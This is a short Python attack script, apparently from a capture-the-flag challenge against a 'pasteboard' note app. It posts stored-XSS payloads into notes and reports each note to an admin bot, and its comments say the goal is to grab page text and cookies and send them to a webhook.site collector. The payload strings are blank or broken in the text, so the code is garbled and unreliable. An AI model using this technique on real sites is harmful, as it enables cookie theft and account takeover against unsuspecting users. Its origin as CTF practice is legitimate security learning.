import requests
import time
BASE_URL = "https://pasteboard-1fb68b7836775bea.chals.uoftctf.org"
WEBHOOK = "https://webhook.site/d8111fd3-599a-47ab-bcab-94d5ec54e078"
# Alternative payloads
payloads = [
# Try to get all text content
f'
',
# Try to get cookies directly
f'',
# Try XMLHttpRequest
f'',
]
for i, payload in enumerate(payloads, 1):
print(f"\n[*] Trying payload {i}/{len(payloads)}...")
session = requests.Session()
response = session.post(
f"{BASE_URL}/note/new",
data={"title": f"Test {i}", "body": payload},
allow_redirects=False
)
if response.status_code == 302:
location = response.headers.get('Location')
print(f"[+] Paste created: {BASE_URL}{location}")
report_response = session.post(f"{BASE_URL}/report", data={"url": location})
if report_response.status_code == 202:
print(f"[+] Reported to bot!")
time.sleep(5)
print("\n[*] All payloads sent. Check webhook!")